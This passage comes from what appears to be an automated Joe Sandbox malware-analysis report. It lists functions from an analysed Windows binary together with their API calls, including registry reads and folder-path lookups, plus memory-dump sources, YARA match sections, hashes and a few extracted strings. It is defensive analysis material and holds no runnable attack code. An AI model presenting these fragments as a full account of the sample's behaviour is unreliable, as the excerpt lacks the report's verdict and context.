                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 0ef9c179c82b71a167ca0fb082d74e0cf1fef794bfcc1fc0e67527614a488404
                                  • Instruction ID: 4488b194ef23efb872a13da267eea1eb7876afbe842652a1b5606e75cd169fd3
                                  • Opcode Fuzzy Hash: 0ef9c179c82b71a167ca0fb082d74e0cf1fef794bfcc1fc0e67527614a488404
                                  • Instruction Fuzzy Hash: C141B07060410ADFCB26DF68C884EEE77B8FF58300F154189F8059B351EB70AAA6CB91
                                  Function 00318050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003180BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003180EA
                                  • StrCmpCA.SHLWAPI(00000000,00334C3C), ref: 00318102
                                  • lstrlen.KERNEL32(00000000), ref: 00318140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 38c87c0a4c6ed42ed8108f6529e4a5f9c9a7776d382d2954ef22905dd7299740
                                  • Instruction ID: fc449ca5db00ce95b3d0c9ff3da86bb3525026dd3857fc4821298f5f4b293bd3
                                  • Opcode Fuzzy Hash: 38c87c0a4c6ed42ed8108f6529e4a5f9c9a7776d382d2954ef22905dd7299740
                                  • Instruction Fuzzy Hash: 2C417372600106ABCB26DF7CD984BEABBF4EF48700F11816CA845D7244EF34D986CB94
                                  Function 00323130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00323166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0032316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,0101BB60,00000000,00020119,?), ref: 0032318C
                                  • RegQueryValueExA.ADVAPI32(?,0102D348,00000000,00000000,00000000,000000FF), ref: 003231A7
                                  • RegCloseKey.ADVAPI32(?), ref: 003231B1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 2c29be027f415c1197306e9a4b91608c37b57d0d1a76fe20adf696b2b6d10baa
                                  • Instruction ID: 6c4465e6ef39bcd8a2644aff032c165f0d5ad39c193d1461cd3214f3b035d18a
                                  • Opcode Fuzzy Hash: 2c29be027f415c1197306e9a4b91608c37b57d0d1a76fe20adf696b2b6d10baa
                                  • Instruction Fuzzy Hash: E41130B6A44219AFD714DB94EC49BBBB7BCE744711F004119FA0593780DB75590487A1
                                  Function 00308980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1D5
                                    • Part of subcall function 0032A1C0: std::exception::exception.LIBCMT ref: 0032A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003089CD
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 49e54e8312375aebf42b76d6d523ec5074e47b3c86389d30e5bb2028a5916405
                                  • Instruction ID: 3bec2d968cf2b9c67c99fcae0cbdaf7d168853d540766f5fbd518a782d33846b
                                  • Opcode Fuzzy Hash: 49e54e8312375aebf42b76d6d523ec5074e47b3c86389d30e5bb2028a5916405
                                  • Instruction Fuzzy Hash: D421D6723016508BC722EB5CE860A6AF7A9DBA1761B11093FF1C1CB6C1CB71D851C3A5
                                  Function 00308850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308883
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 2bd74e5d743b69bc7a7ba679da4c86def6ae274961d5a87c05cf944f2a1d2268
                                  • Instruction ID: c4805d27f465491583144e5b28d84b25c56fa7e8f4961f6e5ec42528eb8f0ae1
                                  • Opcode Fuzzy Hash: 2bd74e5d743b69bc7a7ba679da4c86def6ae274961d5a87c05cf944f2a1d2268
                                  • Instruction Fuzzy Hash: 7E3187B5E005159FCB09DF58C8916AEBBB6EB88350F14C269E915EF385DB30AD01CBD1
                                  Function 00325910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325922
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 038b783969037af6b36371d661d7d7aa660510ecee0e8946d2ad32d9b370d59e
                                  • Instruction ID: 5a67ae9131dccfe02e215f47802ed4b2cbe6f14ef410bdbddf809525659251ae
                                  • Opcode Fuzzy Hash: 038b783969037af6b36371d661d7d7aa660510ecee0e8946d2ad32d9b370d59e
                                  • Instruction Fuzzy Hash: 3B117030318B60CBD7238B2CF840719B7E5AB91761F250A99E0D18B695C771EA81C7A1
                                  Function 00323CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0032A430,000000FF), ref: 00323D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00323D27
                                  • wsprintfA.USER32 ref: 00323D37
                                    • Part of subcall function 003271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003271FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 2ba6c8ccd90344bb7331d560f3d8ab86df08f1c245c7b8997ad938cbd792988d
                                  • Instruction ID: 6a70d2fd52e83f1f993a3e1cbf429157351734b503f2875eea6964cc72db3c39
                                  • Opcode Fuzzy Hash: 2ba6c8ccd90344bb7331d560f3d8ab86df08f1c245c7b8997ad938cbd792988d
                                  • Instruction Fuzzy Hash: 6A01C0B1644710BBE7145B54DC4EF6ABB68FB55B61F100115FA059B3D0D7B42904CAA1
                                  Function 00308710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00308737
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A188
                                    • Part of subcall function 0032A173: std::exception::exception.LIBCMT ref: 0032A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 80bdbbb4cc5836de8430f7e56af5a80cdd4792982dc250e9698ebe234771f3c5
                                  • Instruction ID: a4184f52802fbe1f59ce5d1d115f277f2beeb38fe46cc97350950149a6143b3b
                                  • Opcode Fuzzy Hash: 80bdbbb4cc5836de8430f7e56af5a80cdd4792982dc250e9698ebe234771f3c5
                                  • Instruction Fuzzy Hash: FAF0F033B010310FC306663D8C8409FA80657E079033AC720E88AEF29DDC30EC8281D4
                                  Function 003286D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0032781C: __mtinitlocknum.LIBCMT ref: 00327832
                                    • Part of subcall function 0032781C: __amsg_exit.LIBCMT ref: 0032783E
                                  • ___addlocaleref.LIBCMT ref: 00328756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu3$xt3
                                  • API String ID: 3105635775-3877037853
                                  • Opcode ID: d77e42991292740531999373fd0dec80305541f0e41bd90ef6a0fde5bdfc4c04
                                  • Instruction ID: f006dad1a57817457ae430f240934504c90d63388fc932dcc99b415ddc4d98c1
                                  • Opcode Fuzzy Hash: d77e42991292740531999373fd0dec80305541f0e41bd90ef6a0fde5bdfc4c04
                                  • Instruction Fuzzy Hash: F201D671845710DAE722AF79E84A74EF7E0BF51320F20890DE1D65B2E0CBB4A604CB14
                                  Function 0031E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031E544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E573
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E581
                                  • lstrcat.KERNEL32(?,0102D108), ref: 0031E59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 2f6fbe34dc99c6430b3794678ffdac6697d9a502ee8c1e7840f3b21369078a27
                                  • Instruction ID: 464f66ab5b0db06e682ecfcf0b4800abf7dd9027e2deec67d25c070f0a8d2b6c
                                  • Opcode Fuzzy Hash: 2f6fbe34dc99c6430b3794678ffdac6697d9a502ee8c1e7840f3b21369078a27
                                  • Instruction Fuzzy Hash: 3051B8B5A10208AFC75BEB54EC56EFE737DEB58300F444458F9059B381DE70AE898BA0
                                  Function 00321FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00321FDF, 00321FF5, 003220B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
